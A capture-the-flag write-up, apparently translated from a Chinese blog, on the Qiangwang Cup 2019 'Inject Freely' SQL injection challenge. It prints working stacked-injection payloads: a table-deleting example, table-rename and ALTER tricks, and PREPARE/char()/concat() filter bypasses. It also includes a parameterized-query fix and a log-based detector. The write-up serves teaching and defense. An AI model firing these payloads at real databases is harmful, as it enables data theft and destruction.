[Qiangwang Cup (强网杯) 2019] 随便注 ("Inject Freely") 1

0x01 Stacked injection (stacked queries)

Stacked injection gives the attacker a great deal of control. Unlike UNION-based injection, which is limited to SELECT statements, stacked injection can be used to execute arbitrary SQL statements.

How stacked injection works

In SQL, a semicolon marks the end of a statement. If another statement is appended after the semicolon, it is executed as well; appending further semicolons and statements lets several statements run in a single call to the database.

Example of a stacked-injection attack

When this query is executed, the first statement returns the user's information and the second statement deletes the entire contents of the users table.

mysql> select * from users where id =1;delete from users;

Limitations of stacked injection

Stacked injection is not available in every case. Most of the time it cannot be achieved because the API or the database engine does not support executing more than one statement per call.
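The two conditions above (statement separation by `;` and an API that executes several statements per call) can be demonstrated against an in-memory SQLite database. This is an added example and not part of the writeup: it models the challenge's `words` table with constructed rows and contrasts a query builder that concatenates input into a multi-statement call with the single-statement and parameterized forms a defender would ship. The stacked input uses balanced quotes instead of the MySQL `#` comment seen in the writeup's payloads so that the text also parses under SQLite.

```python
import sqlite3

# Constructed rows modelled on the challenge's `words` table (id, data).
SEED_ROWS = [(1, "hello"), (2, "world"), (3, "flag{constructed-sample}")]

# Constructed attacker input: closes the quoted id, ends the statement with ';'
# and appends a second statement. Balanced quotes are used instead of the
# MySQL '#' comment from the writeup so the text also parses under SQLite.
STACKED_INPUT = "1'; DELETE FROM words WHERE '1'='1"


def fresh_db():
    """In-memory SQLite database holding the constructed `words` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE words (id INTEGER, data TEXT)")
    conn.executemany("INSERT INTO words VALUES (?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM words").fetchone()[0]


def lookup_vulnerable(conn, user_input):
    """Concatenates the input and runs it through a multi-statement API.
    executescript() plays the role of a MySQL client with multi-statements
    enabled: every ';'-separated statement in the text is executed, so the
    appended DELETE runs. Returns the row count afterwards."""
    sql = "SELECT id, data FROM words WHERE id = '" + user_input + "'"
    conn.executescript(sql)
    return row_count(conn)


def lookup_single_statement(conn, user_input):
    """Same concatenation bug, but through execute(), which accepts exactly one
    statement. The quote can still be broken out of (ordinary injection), yet
    the API refuses the trailing statement, so stacking is impossible."""
    sql = "SELECT id, data FROM words WHERE id = '" + user_input + "'"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except (sqlite3.Warning, sqlite3.Error) as exc:
        # Python < 3.12 raises sqlite3.Warning, 3.12+ raises ProgrammingError,
        # both with "You can only execute one statement at a time."
        return ("rejected", str(exc))


def lookup_parameterized(conn, user_input):
    """The fix: the statement text is fixed and the input is bound as a value.
    Quotes and semicolons in the input are data, never syntax."""
    return conn.execute(
        "SELECT id, data FROM words WHERE id = ?", (user_input,)
    ).fetchall()


if __name__ == "__main__":
    db = fresh_db()
    print("multi-statement API, rows left:", lookup_vulnerable(db, STACKED_INPUT))
    db = fresh_db()
    print("single-statement API:", lookup_single_statement(db, STACKED_INPUT)[0],
          "rows left:", row_count(db))
    db = fresh_db()
    print("parameterized:", lookup_parameterized(db, STACKED_INPUT),
          "rows left:", row_count(db))
```

Only the first variant loses the table. The second still has an injection bug (the quote is broken out of), which is why the single-statement API is a containment measure, not the fix; binding the value as a parameter is.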

0x02 Method 1: stacked injection + table rename

1. We find that we can dump all the data in the table, but none of it is the flag we need.

2. Trying to look up the database name, we find that many keywords are filtered. Because select is filtered, UNION queries are out of the question.

3. Trying stacked injection, we can list all the database names.

4. That works, so we go on to list the table names.

5. Looking at the table structures, we find the flag in the table `1919810931114514`:

0';desc `1919810931114514`;#

Note: the backtick (`) is the quoting character MySQL uses for database, table, index, column and alias names.

eg. mysql> SELECT * FROM `table` WHERE `id` = '123' ;

1919810931114514 has to be wrapped in backticks, whereas words does not; this is presumably related to the data type (an unquoted all-digit name would otherwise be read as a number).

6. Looking at the structure of the words table, we find it has two columns, id and data.

0';desc words;#

So we can guess that the input box we submit queries through is querying this table.

7. The query statement is therefore very likely: select id,data from words where id =

Since stacked queries are possible, a renaming trick comes to mind: rename words to something arbitrary such as words1, rename 1919810931114514 to words, and change the column flag to id. Combined with the earlier 1' or 1=1# that dumps the whole table, this lets us read the flag.

payload:

0';rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#

8. Now repeat the initial operation, id=1' or 1=1#

0x03 Method 2: prepared statements + stacked injection

How prepared statements are used:

PREPARE name FROM '[sql statement]';   -- define the prepared statement
EXECUTE name;                          -- run the prepared statement
(DEALLOCATE || DROP) PREPARE name;     -- release the prepared statement

The statement text can also be passed in through a variable:

SET @tn = 'hahaha';                        -- store the table name
SET @sql = concat('select * from ', @tn);  -- store the SQL text
PREPARE name FROM @sql;                    -- define the prepared statement
EXECUTE name;                              -- run the prepared statement
(DEALLOCATE || DROP) PREPARE name;         -- release the prepared statement

In this challenge we can use the char() function to turn the ASCII codes of "select" back into the string select, then use concat() to splice it into a complete select query, which bypasses the keyword filter. Alternatively, concat() alone can be used to piece "select" together.

char(115,101,108,101,99,116)  <----->  'select'

payload1: without a variable

1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#

payload2: using a variable

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE hacker from @sqli;EXECUTE hacker;#

payload3: only concat(), without char()

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

Entering any one of these three payloads directly yields the flag.
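From the defender's side, both methods in this writeup leave recognisable traces in the database query log: several statements arriving in one request, schema-changing statements (RENAME/ALTER) issued through the application's connection, and PREPARE statements whose text is assembled at runtime with concat()/char(). The following added example (not part of the original post) runs such checks over constructed log lines laid out like the MySQL general log. The SQL text in lines 2 to 4 is the writeup's own payloads as the server would receive them after the application concatenates them into its query; the timestamps and thread ids are made up.

```python
import re

# Constructed log lines in the layout of the MySQL general log
# (timestamp, thread id, command, argument). Timestamps and thread ids are made
# up; the SQL text of lines 2-4 is the writeup's payloads after concatenation
# into the application's query, the last two lines are legitimate usage.
SAMPLE_LOG = [
    "2019-05-25T10:00:01.000001Z\t  12 Query\tselect id,data from words where id = '1'",
    "2019-05-25T10:00:02.000001Z\t  12 Query\tselect id,data from words where id = '0';desc `1919810931114514`;#'",
    "2019-05-25T10:00:03.000001Z\t  12 Query\tselect id,data from words where id = '0';rename table words to words1;"
    "rename table `1919810931114514` to words;alter table words change flag id varchar(100) "
    "CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#'",
    "2019-05-25T10:00:04.000001Z\t  12 Query\tselect id,data from words where id = '1';"
    "PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#'",
    "2019-05-25T10:00:05.000001Z\t  13 Query\tSET @sql = 'select 1'",
    "2019-05-25T10:00:06.000001Z\t  13 Query\tPREPARE s FROM @sql",
]

LOG_RE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
DDL_RE = re.compile(r"^\s*(rename\s+table|alter\s+table|drop\s+(table|database)|truncate)\b", re.I)
PREPARE_RE = re.compile(r"^\s*prepare\s+\S+\s+from\s+(.*)$", re.I | re.S)
CHAR_CALL_RE = re.compile(r"char\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)


def split_statements(sql):
    """Split on ';' outside quotes, backticks and comments (# and -- to end of line)."""
    stmts, buf, quote, i = [], [], None, 0
    while i < len(sql):
        c = sql[i]
        if quote:
            buf.append(c)
            if c == "\\" and quote != "`" and i + 1 < len(sql):  # backslash escape in '...' / "..."
                buf.append(sql[i + 1])
                i += 1
            elif c == quote:
                quote = None
        elif c in ("'", '"', "`"):
            quote = c
            buf.append(c)
        elif c == "#" or sql.startswith("-- ", i):
            break  # rest of the line is a comment
        elif c == ";":
            stmts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(c)
        i += 1
    tail = "".join(buf).strip()
    return stmts + [tail] if tail else stmts


def decode_char_calls(sql):
    """Replace char(n,...) with the string it spells so a smuggled keyword is visible."""
    return CHAR_CALL_RE.sub(
        lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'", sql)


def analyse_query(sql):
    """Return (rule, detail) findings for one logged query text."""
    findings = []
    stmts = split_statements(sql)
    if len(stmts) > 1:
        findings.append(("stacked_query", "%d statements in one request" % len(stmts)))
    for s in stmts:
        if DDL_RE.match(s):
            findings.append(("ddl_from_app", s[:60]))
        m = PREPARE_RE.match(s)
        if m:
            src = m.group(1).strip()
            # Legitimate use: a string literal or a user variable. Anything else
            # (concat(), char(), ...) builds the statement text at runtime.
            if not (src.startswith("@") or (src[:1] in ("'", '"') and src[-1:] == src[:1])):
                findings.append(("dynamic_prepare", decode_char_calls(src)[:60]))
    return findings


def scan_log(lines):
    """Return (thread_id, sql, findings) for every Query entry that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, thread, sql = m.groups()
        findings = analyse_query(sql)
        if findings:
            hits.append((int(thread), sql, findings))
    return hits


if __name__ == "__main__":
    for thread, sql, findings in scan_log(SAMPLE_LOG):
        print("thread %d: %s" % (thread, sql[:70]))
        for rule, detail in findings:
            print("    %-16s %s" % (rule, detail))
```

The statement splitter matters more than the rules: a naive `sql.count(";")` would be fooled by a semicolon inside a string literal, and `char()` decoding is what turns the otherwise opaque payload1 into a visible `concat('select', ...)`. Legitimate PREPARE usage with a literal or a user variable produces no finding, so the last two sample lines are silent.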

References:
https://www.sqlinjection.net/stacked-queries/
https://www.jianshu.com/p/36f0772f5ce8

Origin: www.cnblogs.com/wjw-zm/p/12359735.html